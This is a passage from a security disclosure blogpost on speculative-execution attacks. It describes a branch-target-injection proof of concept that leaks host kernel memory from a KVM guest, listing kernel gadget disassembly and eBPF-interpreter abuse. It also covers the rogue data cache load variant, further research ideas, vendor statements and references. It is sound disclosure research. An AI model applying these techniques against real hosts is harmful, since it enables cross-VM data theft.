The PoC assumes that the VM does not have access to hugepages.To discover eviction sets for all L3 cache sets with a specific alignment relative to a 4KiB page boundary, the PoC first allocates 25600 pages of memory. Then, in a loop, it selects random subsets of all remaining unsorted pages such that the expected number of sets for which an eviction set is contained in the subset is 1, reduces each subset down to an eviction set by repeatedly accessing its cache lines and testing whether the cache lines are always cached (in which case they're probably not part of an eviction set) and attempts to use the new eviction set to evict all remaining unsorted cache lines to determine whether they are in the same cache set [12].
Locating the host-virtual address of a guest page
Because this attack uses a FLUSH+RELOAD approach for leaking data, it needs to know the host-kernel-virtual address of one guest page. Alternative approaches such as PRIME+PROBE should work without that requirement.

The basic idea for this step of the attack is to use a branch target injection attack against the hypervisor to load an attacker-controlled address and test whether that caused the guest-owned page to be loaded. For this, a gadget that simply loads from the memory location specified by R8 can be used - R8-R11 still contain guest-controlled values when the first indirect call after a guest exit is reached on this kernel build.

We expected that an attacker would need to either know which eviction set has to be used at this point or brute-force it simultaneously; however, experimentally, using random eviction sets works, too. Our theory is that the observed behavior is actually the result of L1D and L2 evictions, which might be sufficient to permit a few instructions worth of speculative execution.

The host kernel maps (nearly?) all physical memory in the physmap area, including memory assigned to KVM guests. However, the location of the physmap is randomized (with a 1GiB alignment), in an area of size 128PiB. Therefore, directly bruteforcing the host-virtual address of a guest page would take a long time. It is not necessarily impossible; as a ballpark estimate, it should be possible within a day or so, maybe less, assuming 12000 successful injections per second and 30 guest pages that are tested in parallel; but not as impressive as doing it in a few minutes.

To optimize this, the problem can be split up: First, brute-force the physical address using a gadget that can load from physical addresses, then brute-force the base address of the physmap region. Because the physical address can usually be assumed to be far below 128PiB, it can be brute-forced more efficiently, and brute-forcing the base address of the physmap region afterwards is also easier because then address guesses with 1GiB alignment can be used.

To brute-force the physical address, the following gadget can be used:

ffffffff810a9def: 4c 89 c0 mov rax,r8
ffffffff810a9df2: 4d 63 f9 movsxd r15,r9d
ffffffff810a9df5: 4e 8b 04 fd c0 b3 a6 mov r8,QWORD PTR [r15*8-0x7e594c40]
ffffffff810a9dfc: 81
ffffffff810a9dfd: 4a 8d 3c 00 lea rdi,[rax+r8*1]
ffffffff810a9e01: 4d 8b a4 00 f8 00 00 mov r12,QWORD PTR [r8+rax*1+0xf8]
ffffffff810a9e08: 00

This gadget permits loading an 8-byte-aligned value from the area around the kernel text section by setting R9 appropriately, which in particular permits loading page_offset_base, the start address of the physmap. Then, the value that was originally in R8 - the physical address guess minus 0xf8 - is added to the result of the previous load, 0xfa is added to it, and the result is dereferenced.
Cache set selection
To select the correct L3 eviction set, the attack from the following section is essentially executed with different eviction sets until it works.
Leaking data
At this point, it would normally be necessary to locate gadgets in the host kernel code that can be used to actually leak data by reading from an attacker-controlled location, shifting and masking the result appropriately and then using the result of that as offset to an attacker-controlled address for a load. But piecing gadgets together and figuring out which ones work in a speculation context seems annoying. So instead, we decided to use the eBPF interpreter, which is built into the host kernel - while there is no legitimate way to invoke it from inside a VM, the presence of the code in the host kernel's text section is sufficient to make it usable for the attack, just like with ordinary ROP gadgets.

The eBPF interpreter entry point has the following function signature:

static unsigned int __bpf_prog_run(void *ctx, const struct bpf_insn *insn)

The second parameter is a pointer to an array of statically pre-verified eBPF instructions to be executed - which means that __bpf_prog_run() will not perform any type checks or bounds checks. The first parameter is simply stored as part of the initial emulated register state, so its value doesn't matter.

The eBPF interpreter provides, among other things:

multiple emulated 64-bit registers
64-bit immediate writes to emulated registers
memory reads from addresses stored in emulated registers
bitwise operations (including bit shifts) and arithmetic operations

To call the interpreter entry point, a gadget that gives RSI and RIP control given R8-R11 control and controlled data at a known memory location is necessary. The following gadget provides this functionality:

ffffffff81514edd: 4c 89 ce mov rsi,r9
ffffffff81514ee0: 41 ff 90 b0 00 00 00 call QWORD PTR [r8+0xb0]

Now, by pointing R8 and R9 at the mapping of a guest-owned page in the physmap, it is possible to speculatively execute arbitrary unvalidated eBPF bytecode in the host kernel. Then, relatively straightforward bytecode can be used to leak data into the cache.
Variant 3: Rogue data cache load
Basically, read Anders Fogh's blogpost: https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/

In summary, an attack using this variant of the issue attempts to read kernel memory from userspace without misdirecting the control flow of kernel code. This works by using the code pattern that was used for the previous variants, but in userspace. The underlying idea is that the permission check for accessing an address might not be on the critical path for reading data from memory to a register, where the permission check could have significant performance impact. Instead, the memory read could make the result of the read available to following instructions immediately and only perform the permission check asynchronously, setting a flag in the reorder buffer that causes an exception to be raised if the permission check fails.

We do have a few additions to make to Anders Fogh's blogpost:

"Imagine the following instruction executed in usermode
mov rax,[somekernelmodeaddress]
It will cause an interrupt when retired, [...]"

It is also possible to already execute that instruction behind a high-latency mispredicted branch to avoid taking a page fault. This might also widen the speculation window by increasing the delay between the read from a kernel address and delivery of the associated exception.

"First, I call a syscall that touches this memory. Second, I use the prefetcht0 instruction to improve my odds of having the address loaded in L1."

When we used prefetch instructions after doing a syscall, the attack stopped working for us, and we have no clue why. Perhaps the CPU somehow stores whether access was denied on the last access and prevents the attack from working if that is the case?

"Fortunately I did not get a slow read suggesting that Intel null’s the result when the access is not allowed."

That (read from kernel address returns all-zeroes) seems to happen for memory that is not sufficiently cached but for which pagetable entries are present, at least after repeated read attempts. For unmapped memory, the kernel address read does not return a result at all.
Ideas for further research
We believe that our research provides many remaining research topics that we have not yet investigated, and we encourage other public researchers to look into these.
This section contains an even higher amount of speculation than the rest of this blogpost - it contains untested ideas that might well be useless.
Leaking without data cache timing
It would be interesting to explore whether there are microarchitectural attacks other than measuring data cache timing that can be used for exfiltrating data out of speculative execution.
Other microarchitectures
Our research was relatively Haswell-centric so far. It would be interesting to see details e.g. on how the branch prediction of other modern processors works and how well it can be attacked.
Other JIT engines
We developed a successful variant 1 attack against the JIT engine built into the Linux kernel. It would be interesting to see whether attacks against more advanced JIT engines with less control over the system are also practical - in particular, JavaScript engines.
More efficient scanning for host-virtual addresses and cache sets
In variant 2, while scanning for the host-virtual address of a guest-owned page, it might make sense to attempt to determine its L3 cache set first. This could be done by performing L3 evictions using an eviction pattern through the physmap, then testing whether the eviction affected the guest-owned page.

The same might work for cache sets - use an L1D+L2 eviction set to evict the function pointer in the host kernel context, use a gadget in the kernel to evict an L3 set using physical addresses, then use that to identify which cache sets guest lines belong to until a guest-owned eviction set has been constructed.
Dumping the complete BTB state
Given that the generic BTB seems to only be able to distinguish 231-8 or fewer source addresses, it seems feasible to dump out the complete BTB state generated by e.g. a hypercall in a timeframe around the order of a few hours. (Scan for jump sources, then for every discovered jump source, bisect the jump target.) This could potentially be used to identify the locations of functions in the host kernel even if the host kernel is custom-built.

The source address aliasing would reduce the usefulness somewhat, but because target addresses don't suffer from that, it might be possible to correlate (source,target) pairs from machines with different KASLR offsets and reduce the number of candidate addresses based on KASLR being additive while aliasing is bitwise.

This could then potentially allow an attacker to make guesses about the host kernel version or the compiler used to build it based on jump offsets or distances between functions.
Variant 2: Leaking with more efficient gadgets
If sufficiently efficient gadgets are used for variant 2, it might not be necessary to evict host kernel function pointers from the L3 cache at all; it might be sufficient to only evict them from L1D and L2.
Various speedups
In particular the variant 2 PoC is still a bit slow. This is probably partly because:

It only leaks one bit at a time; leaking more bits at a time should be doable.
It heavily uses IRETQ for hiding control flow from the processor.

It would be interesting to see what data leak rate can be achieved using variant 2.
Leaking or injection through the return predictor
If the return predictor also doesn't lose its state on a privilege level change, it might be useful for either locating the host kernel from inside a VM (in which case bisection could be used to very quickly discover the full address of the host kernel) or injecting return targets (in particular if the return address is stored in a cache line that can be flushed out by the attacker and isn't reloaded before the return instruction).

However, we have not performed any experiments with the return predictor that yielded conclusive results so far.
Leaking data out of the indirect call predictor
We have attempted to leak target information out of the indirect call predictor, but haven't been able to make it work.
Vendor statements
The following statement were provided to us regarding this issue from the vendors to whom Project Zero disclosed this vulnerability:
Intel
No current statement provided at this time.
AMD
AMD provided the following link: http://www.amd.com/en/corporate/speculative-execution
ARM
Arm recognises that the speculation functionality of many modern high-performance processors, despite working as intended, can be used in conjunction with the timing of cache operations to leak some information as described in this blog. Correspondingly, Arm has developed software mitigations that we recommend be deployed.

Specific details regarding the affected processors and mitigations can be found at this website: https://developer.arm.com/support/security-update

Arm has included a detailed technical whitepaper as well as links to information from some of Arm’s architecture partners regarding their specific implementations and mitigations.
Literature
Note that some of these documents - in particular Intel's documentation - change over time, so quotes from and references to it may not reflect the latest version of Intel's documentation.

https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-optimization-manual.pdf: Intel's optimization manual has many interesting pieces of optimization advice that hint at relevant microarchitectural behavior; for example:
"Placing data immediately following an indirect branch can cause a performance problem. If the data consists of all zeros, it looks like a long stream of ADDs to memory destinations and this can cause resource conflicts and slow down branch recovery. Also, data immediately following indirect branches may appear as branches to the branch predication [sic] hardware, which can branch off to execute other data pages. This can lead to subsequent self-modifying code problems."
"Loads can:[...]Be carried out speculatively, before preceding branches are resolved."
"Software should avoid writing to a code page in the same 1-KByte subpage that is being executed or fetching code in the same 2-KByte subpage of that is being written. In addition, sharing a page containing directly or speculatively executed code with another processor as a data page can trigger an SMC condition that causes the entire pipeline of the machine and the trace cache to be cleared. This is due to the self-modifying code condition."
"if mapped as WB or WT, there is a potential for speculative processor reads to bring the data into the caches"
"Failure to map the region as WC may allow the line to be speculatively read into the processor caches (via the wrong path of a mispredicted branch)."
https://software.intel.com/en-us/articles/intel-sdm: Intel's Software Developer Manuals
http://www.agner.org/optimize/microarchitecture.pdf: Agner Fog's documentation of reverse-engineered processor behavior and relevant theory was very helpful for this research.
http://www.cs.binghamton.edu/~dima/micro16.pdf and https://github.com/felixwilhelm/mario_baslr: Prior research by Dmitry Evtyushkin, Dmitry Ponomarev and Nael Abu-Ghazaleh on abusing branch target buffer behavior to leak addresses that we used as a starting point for analyzing the branch prediction of Haswell processors. Felix Wilhelm's research based on this provided the basic idea behind variant 2.
https://arxiv.org/pdf/1507.06955.pdf: The rowhammer.js research by Daniel Gruss, Clémentine Maurice and Stefan Mangard contains information about L3 cache eviction patterns that we reused in the KVM PoC to evict a function pointer.
https://xania.org/201602/bpu-part-one: Matt Godbolt blogged about reverse-engineering the structure of the branch predictor on Intel processors.
https://www.sophia.re/thesis.pdf: Sophia D'Antoine wrote a thesis that shows that opcode scheduling can theoretically be used to transmit data between hyperthreads.
https://gruss.cc/files/kaiser.pdf: Daniel Gruss, Moritz Lipp, Michael Schwarz, Richard Fellner, Clémentine Maurice, and Stefan Mangard wrote a paper on mitigating microarchitectural issues caused by pagetable sharing between userspace and the kernel.
https://www.jilp.org/: This journal contains many articles on branch prediction.
http://blog.stuffedcow.net/2013/01/ivb-cache-replacement/: This blogpost by Henry Wong investigates the L3 cache replacement policy used by Intel's Ivy Bridge architecture.